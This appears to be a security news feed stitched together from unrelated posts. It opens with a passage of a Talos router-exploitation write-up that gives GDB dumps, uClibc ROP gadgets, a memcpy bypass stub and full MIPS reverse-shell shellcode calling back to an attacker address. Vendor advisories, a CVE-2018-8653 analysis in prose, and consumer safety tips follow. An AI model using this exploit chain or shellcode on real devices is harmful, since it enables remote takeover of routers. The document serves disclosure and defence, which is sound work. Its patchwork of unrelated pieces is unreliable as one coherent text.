         zero at       v0 v1 a0       a1 a2 a3

R0   00000000 10000400 00514004 00000035 7dfff821 0051432d 01010101 80808080

           t0 t1      t2 t3 t4       t5 t6 t7

R8   00000002 fffffffe 00000000 00000006 19999999 00000000 00000057 00425d2c

           s0 s1      s2 s3 s4       s5 s6 s7

R16  41414141 41414141 41414141 41414141 41414141 006798f4 006798d0 00000000

           t8 t9      k0 k1 gp       sp s8 ra

R24  00000132 2ab02820 00000000 00000000 00598790 7dfff808 7dfffa62 41414141

       status     lo hi badvaddr    cause pc

     0000040c 00059cf8 000001fa 00590cac 00000024 00425dcc

(GDB)

What do we have here



Additional examination of the registers shown above revealed that a pointer to a location predictably close to the original header data is left laying around after the toUpper() call.

While broken on the final jump in the httpGetMimeTypeByFileName function epilogue, we can examine the data on the stack and find that a portion of our now uppercase header data, including the payload, is stored there.

(GDB) x/32s $sp
x/32s $sp
0x7dfff808:      ""
0x7dfff809:      ""
...
0x7dfff81f:      ""
0x7dfff820:      "5\r\n", 'A' <repeats 197 times>...
0x7dfff8e8:      'A' <repeats 200 times>...
0x7dfff9b0:      'A' <repeats 200 times>...
0x7dfffa78:      'A' <repeats 200 times>...
0x7dfffb40:      'A' <repeats 143 times>, "\r\nCONTENT-LENGTH: 0\r\nACCEPT-ENCODING: GZIP, DEFLATE\r\nAUTH"...
0x7dfffc08:      "ORIZATION: BASIC YWRTAW46YWRTAW4=\r\nCONNECTION: KEEP-ALIVE\r\nUPGRADE-INSECURE-REQUESTS: 1\r\nCONTENT-LENGTH: 0\r\n\r\n"
0x7dfffc77:      ""
0x7dfffc78:      ""
0x7dfffc79:      ""
...
(GDB)


By contrast, if we examine the data following the location pointed to by register $s5, we see that the raw header data is still accessible.

(GDB) x/32s $s5+0x64
x/32s $s5+0x64
0x679958:        ""
0x679959:        ""
...
0x67995f:        ""
0x679960:        "/fs/help"
0x679969:        "elp"
0x67996d:        "HTTP/1.1"
0x679976:        "\n"
0x679978:        "ost: 192.168.0.1\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q"...
0x679a40:        "=0.5\r\n", 'a' <repeats 194 times>...
0x679b08:        'a' <repeats 200 times>...
0x679bd0:        'a' <repeats 200 times>...
0x679c98:        'a' <repeats 200 times>...
0x679d60:        'a' <repeats 146 times>, "\r\nContent-Length: 0\r\nAccept-Encoding: gzip, deflate\r\nA"...
0x679e28:        "uthorization: Basic YWRtaW46YWRtaW4=\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nContent-Length: 0\r\n\r\n"
0x679e9a:        ""
0x679e9b:        ""
...
(GDB)

Examining the permissions for that section of memory revealed that the range is executable, giving an initial thought of jumping directly to the raw header.

# cat /proc/12518/maps
cat /proc/12518/maps
00400000-00538000 r-xp 00000000 1f:02 69         /usr/bin/httpd
00578000-00594000 rw-p 00138000 1f:02 69         /usr/bin/httpd
00594000-006a6000 rwxp 00000000 00:00 0          [heap]
2aaa8000-2aaad000 r-xp 00000000 1f:02 359        /lib/ld-uClibc-0.9.30.so
2aaad000-2aaae000 rw-p 00000000 00:00 0
2aaae000-2aab2000 rw-s 00000000 00:06 0          /SYSV0000002f (deleted)
2aaec000-2aaed000 r--p 00004000 1f:02 359        /lib/ld-uClibc-0.9.30.so
...
7f401000-7f600000 rwxp 00000000 00:00 0
7fcf7000-7fd0c000 rwxp 00000000 00:00 0          [stack]


This ended up not being a worthwhile path due to limitations introduced by toUpper() and an earlier strcmp(). The usage of toUpper() created a condition where any lower case letter had to be considered a bad character. Additionally, since our data passes through a strcmp() call, we could not use any null bytes. These calls left us unable to use any of the following bytes: 0x00, 0x61-0x7a.

Exploitation


Bypassing toUpper()


To get around the issue posed by toUpper(), we created a small piece of code calling memcpy() that does not use any lowercase characters or null bytes to execute after gaining control of $ra. With this code, we were able to copy the header data onto the stack in its original form and jump to it for execution.

move    $a0, $t9         # put the stack pointer into arg1
addiu   $a0, 0x12C       # increase arg1 so we don’t overwrite this code
addiu   $a1, $s5, 0x198  # load the raw header data pointer into arg2
li      $a2, 0x374       # load the size into arg3
li      $t9, 0x2AB01E20  # load $t9 with the address of memcpy()
jalr    $t9         # call memcpy()
move    $t8, $t3         # placeholder to handle delay slot without nulls
move    $t9, $sp         # prep $t9 with the stack pointer
addiu   $t9, 0x14C       # increase the $t9 pointer to the raw header
jalr    $t9         # execute the raw header on the stack
move    $t8, $t3         # placeholder to handle delay slot without nulls


Before we could use this technique, we needed to find a way to gain execution of our memcpy() code. On this device we are fortunate to have an executable stack, however, we did not know where our code would end up. We ended up using a modified ret2libc technique, allowing us to leverage gadgets from uClibc to obtain a pointer to the stack and set up registers for our code.

Our first gadget, located at the uClibc offset address of 0x0002fc84, was used to increment the stack pointer by 0x20 to get past any of the memcpy shellcode. To ensure that control of the program execution was retained after this gadget returned we placed the address of our second gadget at the location 0x20+$sp as required below.

LOAD:0002FC84                 lw $ra, 0x20+var_8($sp)
LOAD:0002FC88                 jr $ra
LOAD:0002FC8C                 addiu $sp, 0x20

The second gadget, located at the uClibc offset address of 0x000155b0, was used to obtain a pointer to the incremented stack buffer. This placed the desired pointer into register $a1. We placed the address of our third gadget at the location 0x58+$sp as required below to ensure that control of the program execution was retained after this gadget returned.

LOAD:000155B0                 addiu $a1, $sp, 0x58+var_40
LOAD:000155B4                 lw $gp, 0x58+var_48($sp)
LOAD:000155B8                 sltiu $v0, 1
LOAD:000155BC                 lw $ra, 0x58+var_8($sp)
LOAD:000155C0                 jr $ra
LOAD:000155C4                 addiu $sp, 0x58


Finally, a gadget located at the uClibc offset address of 0x000172fc was used to jump into the stack buffer.

LOAD:000172FC                 move $t9, $a1
LOAD:00017300                 move $a1, $a2
LOAD:00017304                 sw $v0, 0x4C($a0)
LOAD:00017308                 jr $t9
LOAD:0001730C                 addiu $a0, 0x4C # 'L'


We needed to obtain uClibc's load address so that we could calculate the gadget's true location to successfully use these gadgets. Looking at the process memory map below, we can see that the executable version of uClibc is loaded at the address 0x2aaee000.

# cat /proc/12518/maps
cat /proc/12518/maps
00400000-00538000 r-xp 00000000 1f:02 69         /usr/bin/httpd
00578000-00594000 rw-p 00138000 1f:02 69         /usr/bin/httpd
00594000-006a6000 rwxp 00000000 00:00 0          [heap]
2aaa8000-2aaad000 r-xp 00000000 1f:02 359        /lib/ld-uClibc-0.9.30.so
2aaad000-2aaae000 rw-p 00000000 00:00 0
2aaae000-2aab2000 rw-s 00000000 00:06 0          /SYSV0000002f (deleted)
2aaec000-2aaed000 r--p 00004000 1f:02 359        /lib/ld-uClibc-0.9.30.so
2aaed000-2aaee000 rw-p 00005000 1f:02 359        /lib/ld-uClibc-0.9.30.so
2aaee000-2ab21000 r-xp 00000000 1f:02 363        /lib/libuClibc-0.9.30.so
2ab21000-2ab61000 ---p 00000000 00:00 0
2ab61000-2ab62000 rw-p 00033000 1f:02 363        /lib/libuClibc-0.9.30.so
2ab62000-2ab66000 rw-p 00000000 00:00 0
2ab66000-2ab68000 r-xp 00000000 1f:02 349        /lib/librt-0.9.30.so
2ab68000-2aba7000 ---p 00000000 00:00 0
...
7f001000-7f200000 rwxp 00000000 00:00 0
7f200000-7f201000 ---p 00000000 00:00 0
7f201000-7f400000 rwxp 00000000 00:00 0
7f400000-7f401000 ---p 00000000 00:00 0
7f401000-7f600000 rwxp 00000000 00:00 0
7fcf7000-7fd0c000 rwxp 00000000 00:00 0          [stack]


By taking the load address of uClibc and adding it to the offset address obtained for each of the gadgets, we can get the usable address of the desired code. These addresses can then be strategically placed, causing the execution of our initial code, and subsequently, our payload.

LexraMIPS shellcode


While LexraMIPS is based off of the MIPS specification, it does deviate enough to cause inconsistencies when attempting to execute some standard MIPS instructions. Due to this, we chose to develop shellcode specifically for LexraMIPS, using a GCC toolchain found here. The code below takes the approach of creating a connection back to the attacker, duplicating stdin, stdout, and stderr into the socket file descriptor, and finally spawning a shell.

We start by opening a socket on the device, leveraging a nor technique to avoid any null bytes in our $t7 register. It should be noted that the MIPS $zero register does not contain any null bytes when used.

li $t7, -6           # set up $t7 with the value 0xfffffffa
nor $t7, $t7, $zero  # nor $t7 with zero to get the value 0x05 w/o nulls
addi $a0, $t7, -3    # $a0 must hold family (AF_INET - 0x02)
addi $a1, $t7, -3    # $a1 must hold type (SOCK_STREAM - 0x02)
slti $a2, $zero, -1  # $a2 must hold protocol (essentially unset - 0x00)
li $v0, 4183         # sets the desired syscall to 'socket'
syscall 0x40404      # triggers a syscall, removing null bytes


With a socket opened, we use a connect syscall to create a TCP connection from the device to the attacker. Null bytes were a particular issue in this step, as the default subnet for this device contained a zero. To avoid this issue, we leverage a technique that forced our prepped register values to overflow and result in the desired IP address without using null bytes.


sw $v0, -36($sp)     # puts the returned socket reference onto the stack
lw $a0, -36($sp)     # $a0 must hold the file descriptor - pulled from the stack
sw $a1, -32($sp)     # place socket type (SOCK_STREAM - 0x02) onto the stack
lui $t7, 8888        # prep the upper half of $t7 register with the port number
ori $t7, $t7, 8888   # or the $t7 register with the desired port number
sw $t7, -28($sp)     # place the port onto the stack
lui $t7, 0xc0a7      # put the first half of the ip addr into $t7 (192.166)
ori $t7, 0xff63      # put the second half of the ip addr into $t7 (255.99)
addiu $t7, 0x101     # fix the ip addr (192.166.255.99 --> 192.168.0.100)
sw $t7, -26($sp)     # put the ip address onto the stack
addiu $a1, $sp, -30  # put a pointer to the sockaddr struct into $a1
li $t7, -17          # load 0xffef into $t7 for later processing
nor $a2, $t7, $zero  # $a2 must hold the address length - 0x10
li $v0, 4170         # sets the desired syscall to 'connect'
syscall 0x40404      # triggers a syscall, removing null bytes


To ensure that the device accepted our input and properly displayed any output, it is necessary to duplicate the stdin, stdout, and stderr file descriptors. By duplicating each of these I/O file descriptors into our socket, we are able to successfully provide input to the device and view any output via the recently set up connection.


lw $t7, -32($sp)     # load $t7 for later file descriptor processing
lw $a0, -36($sp)     # put the socket fd into $a0
lw $a1, -32($sp)     # put the stderr fd into $a1
li $v0, 4063         # sets the desired syscall to 'dup2'
syscall 0x40404      # triggers a syscall, removing null bytes
lw $t7, -32($sp)     # load $t7 for later file descriptor processing
lw $a0, -36($sp)     # put the socket fd into $a0
addi $a1, $t7, -1    # put the stdout fd into $a1
li $v0, 4063         # sets the desired syscall to 'dup2'
syscall 0x40404      # triggers a syscall, removing null bytes
lw $t7, -32($sp)     # load $t7 for later file descriptor processing
lw $a0, -36($sp)     # put the socket fd into $a0
addi $a1, $t7, -2    # put the stdin syscall into $a1
li $v0, 4063         # sets the desired syscall to 'dup2'
syscall 0x40404      # triggers a syscall, removing null bytes



Finally, we use an execve system call to spawn a shell locally on the device. Since this shell is spawned from our socket, and we already have control over stdin/stdout/stderr, we can control the new shell remotely through our connection.

lui $t7, 0x2f2f      # start building the command string    --> //
ori $t7, $t7, 0x6269 # continue building the command string --> bi
sw $t7, -20($sp)     # put the string so far onto the stack
lui $t7, 0x6e2f      # continue building the command string --> n/
ori $t7, $t7, 0x7368 # continue building the command string --> sh
sw $t7, -16($sp)     # put the next portion of the string onto the stack
sw $zero, -12($sp)   # null terminate the command string
addiu $a0, $sp, -20  # place a pointer to the command string into arg 1
sw $a0, -8($sp)      # place a pointer to the command string array onto the stack
sw $zero, -4($sp)    # null terminate the array
addiu $a1, $sp, -8   # load the pointer to our command string array into arg 2
slti $a2, $zero, -1  # sets $a2 to 0
li $v0, 4011         # sets the desired syscall to 'execve'
syscall 0x40404      # triggers a syscall, removing null bytes


With a functional shell on the device, we can continue with our post-exploitation analysis of the device.

Conclusion


Unfortunately these types of vulnerabilities are all to common in IoT devices. Attackers can find these issues and weaponize them to execute code on vulnerable devices. It is imperative that everyone realizes that IoT devices are computers, and like all computers, the software must be maintained to ensure the device is as secure as possible.

Talos will continue to discover and responsibly disclose vulnerabilities, working with vendors to ensure that customers are protected and provide additional deep-dive analysis when necessary. Finding and disclosing zero-day vulnerabilities via coordinated disclosure helps improve the overall security of the devices and software people use on a day-to-day basis. Talos is committed to this effort, developing programmatic ways to identify problems or flaws that could be otherwise exploited by malicious attackers.

For vulnerabilities Talos has disclosed, please refer to our vulnerability report portal.

You can also review our vulnerability disclosure policy here.


Bug bounty: Hack Tesla Model 3 to win your own Model 3

By Waqas

Tesla is partnering with Pwn2Own’s bug bounty to identify vulnerabilities in its Model 3 car software. Electric car maker Tesla announced recently that the company is partnering with Pwn2Own hacking contest organizers in order to help the company identify security issues in its automobiles. Tesla will be a partner in the Pwn2Own bug bounty program […]

This is a post from HackRead.com Read the original post: Bug bounty: Hack Tesla Model 3 to win your own Model 3

Unpatched vCard Flaw Could Let Attackers Hack Your Windows PCs

A zero-day vulnerability has been discovered and reported in the Microsoft's Windows operating system that, under a certain scenario, could allow a remote attacker to execute arbitrary code on Windows machine. Discovered by security researcher John Page (@hyp3rlinx), the vulnerability was reported to the Microsoft security team through Trend Micro's Zero Day Initiative (ZDI) Program over 6

IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653

Microsoft recently patched a critical flaw in Internet Explorer’s scripting engine that could lead to remote code execution. The vulnerability is being exploited in the wild and was originally reported by a researcher from Google’s Threat Analysis Group. Microsoft released an out-of-band patch to fix the vulnerability before the normal patch cycle. McAfee products received an update to detect the threat shortly after the patch was released.

A remote attacker can target Internet Explorer Versions 9 through 11 via a specially crafted website, while a local attacker on a rogue network could also target the Web Proxy Auto-Discovery service, which uses the same vulnerable scripting engine (jscript.dll). Microsoft Edge is not affected; however, other Windows applications that include the scripting engine might be vulnerable until the security patch from Microsoft is applied.

Context

Vulnerabilities targeting Internet Explorer that can be triggered either remotely or locally are prime tools for cybercriminals to compromise many unpatched computers. That is why criminals usually integrate those vulnerabilities into exploit kits, which propagate malware or conduct other nefarious activities against compromised hosts. The threat of exploit kits is one reason to track this type of vulnerability and to ensure all security patches are deployed in a timely manner. In 2018, more than 100 memory corruption vulnerabilities were found in a Microsoft scripting engine (either for Internet Explorer or Edge). See the MITRE website for more details. (For defense-in-depth, products such as McAfee Endpoint Security or McAfee Host Intrusion Prevention can detect and eradicate such threats until patches can be applied.)

Once a CVE ID is released, cybercriminals can take as little as a few weeks (or in some cases days) to integrate it into their exploit kit. For example, CVE-2018-8174 was initially reported to Microsoft in late April by two teams of threat researchers who had observed its exploitation in the wild. Microsoft published an advisory within a week, in early May. Meanwhile, the researchers published their security analysis of the exploit. Only two weeks later a proof-of-concept exploit was publicly released. In the next couple of weeks exploit kits RIG and Magnitude integrated their weaponized versions of the exploit. (A more detailed timeline can be found here.)

It took less than a month for cybercriminals to weaponize the vulnerability initially disclosed by Microsoft; therefore, it is critical to understand the threat posed by these attack vectors, and to ensure counter measures are in place to stop the threat before it can do any damage.

Technical details

The IE scripting engine jscript.dll is a code base that has been heavily audited:

It is no surprise that exploitable bugs are becoming more exotic. This is the case for CVE 2018-8653, which takes three seemingly innocent behaviors and turns them into a use-after-free flaw. A Microsoft-specific extension triggers a rarely explored code path that eventually misbehaves and invokes a frequently used function with unusual arguments. This leads to the use-after-free condition that was exploited in the wild.

The enumerator object: The entry point for this vulnerability is a Microsoft-specific extension, the enumerator object. It offers an API to enumerate opaque objects that belong to the Windows world (mostly ActiveX components, such as a file system descriptor used to list drives on a system). However, it can also be called on a JavaScript array. In this situation, one can access the array member as usual, but objects created this way are stored slightly differently in memory. This is the cause of interesting side effects.

The objects created by calling the Enumerator.prototype.item() function are recognized as an ActiveXObject and, as seen in the creation of eObj, we can under certain circumstances overwrite the “prototype” member that should have been a read-only property.

Unexpected side effect: The ability to overwrite the prototype member of an ActiveXObject can seem innocuous at first, but it can be leveraged to explore a code path that should not be reachable.

When using the “instanceof” keyword, we can see that the right side of the keyword expects a function. However, with a specially crafted object, the instanceof call succeeds and, worse, we can control the code being executed.

The edge case of invoking instanceof on a specially crafted ActiveXObject gives us the opportunity to run custom JavaScript code from a callback we control, which is typically an error-prone situation.

Attackers successfully turned this bug into a use-after-free condition, as we shall see next.

Exploiting the bug: Without getting into too much detail (see the proof of concept later in this document for more info), this bug can be turned into a “delete this” type of primitive, which resembles previously reported bugs.
When the callback function (“f” in our previous example) is invoked, the keyword “this” points to eObj.prototype. If we set it to null and then trigger a garbage collection, the memory backing the object can be freed and later reclaimed. However, as mentioned in the Project Zero bug report, to be successful an entire block of variables needs to be cleared before the memory is freed.

The out-of-band patch: Microsoft released an unscheduled patch to fix this vulnerability. It is common practice for us to look at what changed before and after the patch. Interestingly, this patch changes the strict minimum number of bytes, while the version number of the DLL remains unchanged.

Using the popular diffing tool Diaphora, we compared the version of jscript.dll for Windows 10, x64-bit edition (feature version 1809).

We can see that only a few functions were modified. All but one point to array-related functions. Those were probably patches addressing CVE 2018-8631 (jscript!JsArrayFunctionHeapSort out-of-bounds write). The only one remaining that was substantially modified is NameTbl::InvokeInternal.

Diaphora provides us with a diff of the assembly code of the two versions of the function. In this instance, it is easier to compare the functions side by side in Ida Pro to see what has changed. A quick glance toward the end of the function shows the introduction of two calls to GCRoot::~GCRoot (the destructor of the object GCRoot).

Looking at the implementation of ~GCRoot, we see it is the same code as that inlined in that function created by the compiler in the older version of the DLL.

In the newer version of the DLL, this function is called twice; while in the unpatched version, the code was called only once (inlined by the compiler, hence the absence of a function call). In C++ parlance, ~GCRoot is the destructor of GCRoot, so we may want to find the constructor of GCRoot. An easy trick is to notice the magic offset 0x3D0 to see if this value is used anywhere else. We find it near the top of the same function (the unpatched version is on the left):

Diving into the nitty gritty of garbage collection for jscript.dll is beyond the scope of this post, so let’s make some assumptions. In C++/C#, GCRoot would usually design a template to keep track of references pointing to the object being used, so those do not have garbage collection. Here it looks as though we are saving stack addresses (aka local variables) into a list of GCRoot objects to tell the garbage collector not to collect the objects whose pointers are on those specific locations on the stack. In hindsight this makes sense; we were able to “delete this” because “this” was not tracked by the garbage collector, so now Microsoft makes sure to specifically add that stack variable to the tracked elements.

We can verify this hypothesis by tracing the code around an invocation of instanceof. It turns out that just before invoking our custom “isPrototypeOf” callback function, a call to NameTbl::GetVarThis stores a pointer in the newly “protected” stack variable and then invokes ScrFncObj::Call to execute our callback.

Looking at unexpected behavior in `instanceof`: Curious readers might wonder why it is possible to invoke instanceof on a custom object rather than on a function (as described previously). When instanceof is invoked in JavaScript, the CScriptRuntime::InstOf function is called behind the scene. Early on, the function distinguishes two cases. If the variable type is 0x81 (which seems to be a broad type for a JavaScript object on the heap), then it invokes a virtual function that returns true/false if the object can be called. On the other hand, if the type is not 0x81, a different path is followed; it tries to automatically resolve the prototype object and invoke isPrototypeOf.

The 0x81 path:

The not 0x81 path:

 

 

Proof of concept

Now that we have seen the ins and outs of the bug, let’s look at a simple proof of concept that exhibits the use-after-free behavior.

First, we set up a couple of arrays, so that everything that can be preallocated is allocated, and the heap is in a somewhat ready state for the use after free.

Then, we declare our custom callback and trigger the vulnerability:

For some reason, the objects array needs to be freed and garbage collected before the next step of the exploit. This could be due to some side effect of freeing the ActiveXObject. The memory is reclaimed when we assign “1” to the property reallocPropertyName. That variable is a magic string that will be copied over the recently freed memory to mimic legitimate variables. It is created as shown:

The 0x0003 is a variable type that tells us the following value is an integer and that 1337 is its value. The string needs to be long enough to trigger an allocation of the same or similar size as the memory block that was recently freed.

To summarize, JavaScript variables (here, the RegExp objects) are stored in a block; when all the variables from the block are freed, the block itself is freed. In the right circumstances, the newly allocated string can take the place of the recently freed block, and because “this” is still dangling in our callback, it can be used for some type confusion. (This is the method used by the attackers, but beyond the scope of this post.) In this example, the code will print 1337 instead of an empty RegExp.

McAfee coverage

Please refer to the McAfee product bulletin for full coverage updates. Here is a short summary of current product coverage as of this writing.

Endpoint products: Endpoint Security (ENS), ENS Adaptive Threat Protection (ENS-ATP), Host Intrusion Prevention (HIPS), VirusScan Enterprise (VSE), WSS.

  • ENS (10.2.0+) with Exploit Prevention
    • Proactively covered by McAfee Generic Buffer Overflow Protection Signature ID 428
  • HIPS (8.0.0+)
    • Proactively covered by McAfee Generic Buffer Overflow Protection Signature ID 428
  • ENS (all versions) and WSS (all versions). Coverage based on samples observed so far. This protection is expected to be expanded over the next few days as viable exploitation attempts are seen.
    • Minimum DAT: V3 DAT (3564)
    • Detection names: Exploit-CVE2018-8653 and Exploit-CVE2018-8653.a
  • VSE (8.8+). Coverage based on samples observed so far. This protection is expected to be expanded over the next few days as viable exploitation attempts are seen.
    • Minimum DAT: V2 DAT (9113)
    • Detection names: Exploit-CVE2018-8653 and Exploit-CVE2018-8653.a

Content summary

  • DATs: V2 DAT (9113), V3 DAT (3564)
  • Generic Buffer Overflow Protection Signature ID 428

MITRE score

The base score (CVSS v3.0) for this vulnerability is 7.5 (High) with an impact score of 5.9 and an exploitability score of 1.6.

Conclusion

CVE-2018-8653 targets multiple versions of Internet Explorer and other applications that rely on the same scripting engine. Attackers can execute arbitrary code on unpatched hosts from specifically crafted web pages or JavaScript files. Even though the bug was recently fixed by Microsoft, we can expect exploit kits to soon deploy a weaponized version of this critical vulnerability, leveraging it to target remaining unpatched systems. The technical analysis in this post should provide enough information for defenders to ensure their systems will withstand the threat and to know which primitives to look for as an entry point for the attack. McAfee security products can be leveraged to provide specific “virtual patching” for this threat until full software patches can be deployed, while current generic buffer overflow protection rules can be used to fingerprint exploit attempts against this and similar vulnerabilities.

The post IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653 appeared first on McAfee Blogs.

Smashing Security #110: What? You can get paid to leave Facebook?

Smashing Security #110: What? You can get paid to leave Facebook?

Twitter and the not-so-ethical hacking of celebrity accounts, study discovers how you can pay someone to quit Facebook for a year, and the millions of dollars you can make from uncovering software vulnerabilities.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Maria Varmazis.

New Systemd Privilege Escalation Flaws Affect Most Linux Distributions

Security researchers have discovered three vulnerabilities in Systemd, a popular init system and service manager for most Linux operating systems, that could allow unprivileged local attackers or malicious programs to gain root access on the targeted systems. The vulnerabilities, assigned as CVE-2018-16864, CVE-2018-16865, and CVE-2018-16866, actually resides in the "systemd-journald" service

Vulnerability Spotlight: Multiple Apple IntelHD5000 privilege escalation vulnerabilities


Tyler Bohan of Cisco Talos discovered this vulnerability.

Executive Summary

A memory corruption vulnerability exists in the IntelHD5000 kernel extension when dealing with graphics resources inside of Apple OSX 10.13.4. A library inserted into the VLC media application can cause an out-of-bounds access inside of the KEXT leading to a use after free and invalid memory access in the context of the kernel. This can be used for privilege escalation.

Vulnerability Details

IntelHD5000 use-after-free vulnerability (TALOS-2018-0614/CVE-2018-XXXX)

Apple supports multiple different GPU versions inside of OSX. With this functionality comes multiple different kernel extensions assigned to deal with the details of the interaction between user space and the kernel to get the graphics buffers drawn effectively. The provided GPU on the retina MacBook Pro is the Apple Intel HD 5000 processor. Therefore, this kernel extension is used in graphics rendering and processing throughout and is subject to a use-after-free privilege escalation vulnerability. The vulnerability is also reachable from inside the Safari sandbox creating a larger potential attack surface.

A brief look at Apple kernel extensions shows that it uses a restricted subset language and a unique way of communication between userspace and the kernel known as IOKit. Essentially, an IOKit extension inherits class from a UserClient and registers its own methods to handle user interaction. There are also various types that can be passed in to connect to different UserClients stored under the same umbrella name. Upon connection, a port is returned and this port is forwarded through in all further communications. In the proof of concept included, VLC is used to handle this basic connection and port setup.

For additional information, please see the advisory here.

IntelHD5000 use-after-free vulnerability (TALOS-2018-0615/CVE-2018-XXXX)

Apple supports multiple different GPU versions inside of OSX. With this functionality comes multiple different kernel extensions assigned to deal with the details of the interaction between userspace and the kernel to get the graphics buffers drawn effectively. The provided GPU on the retina MacBook Pro is the Apple Intel HD 5000 processor. This kernel extension is used in graphics rendering and processing throughout and is the subject to a use-after-free privilege escalation vulnerability. The vulnerability is also reachable from inside the Safari sandbox, creating a larger potential attack surface.

A brief look at Apple kernel extensions shows that it uses a restricted subset language and a unique way of communication between userspace and the kernel known as IOKit. Essentially, an IOKit extension inherits from a UserClient class and registers its own methods to handle user interaction. There are also various types that can be passed in to connect to different UserClients stored under the same umbrella name. Upon connection, a port is returned and this port is forwarded through in all further communications. In the proof of concept included, VLC is used to handle this basic connection and port setup.

For additional information, please see the advisory here.

Versions Tested

OS X 10.13.4 - MacBookPro11.4

Conclusion

As this vulnerability can be triggered potentially via the Safari web browser, it’s always important for users to understand that impacted software, drivers and libraries are widely used throughout an operating system’s own ecosystem. Privilege escalations can allow an attacker to move from an untrusted user account to a trusted system account within the operating system, which can allow for administrative access and therefore allows adversaries to carry out malicious actions.


Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 46858 - 46859

8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured wi-fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public wi-fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Choose a password that is unhackable rather than one that is super easy to remember.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL; it’s design, its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to such as advertisers, website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!

 

The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.

Don’t Get PWNed by Fake Gaming Currency Sites

If you’re a gamer, you know how important virtual currency is. It allows you to purchase new costumes and weapons to personalize your avatar. But how does one go about gaining virtual currency? Players complete in-game challenges and are rewarded with coins to spend in their virtual world. These challenges can be pretty difficult and time-consuming to complete. As a result, many players look to various websites as an easier way to download more gaming currency. Unfortunately, malicious actors are taking advantage of this trend to scam gamers into downloading malware or PUPs (potentially unwanted programs).

There are a variety of techniques scammers use to trick players into utilizing their malicious sites. The first is fake chat rooms. Scammers will set up seemingly legitimate chat rooms where users can post comments or ask questions. What users don’t know is that a bot is actually answering their inquiries automatically. Scammers also ask these victims for “human interaction” by prompting them to enter their personal information via surveys to complete the currency download. What’s more – the message will show a countdown to create a sense of urgency for the user.

These scammers also use additional techniques to make their sites believable, including fake Facebook comments and “live” recent activity updates. The comments and recent activity shown are actually hard-coded into the scam site, giving the appearance that other players are receiving free gaming currency.

These tactics, along with a handful of others, encourage gamers to use the scam sites so cybercriminals can distribute their malicious PUPs or malware. So, with such deceptive sites existing around the internet, the next question is – what can players do to protect themselves from these scammers? Check out the following tips to avoid this cyberthreat:

  • Exercise caution when clicking on links. If a site for virtual currency is asking you to enter your username, password, or financial information, chances are the website is untrustworthy. Remember, when in doubt, always err on the side of caution and avoid giving your information to a site you’re not 100% sure of.
  • Put the chat room to the test. To determine if a chat site is fake, ask the same question a few times. If you notice the same response, it is likely a phony website.
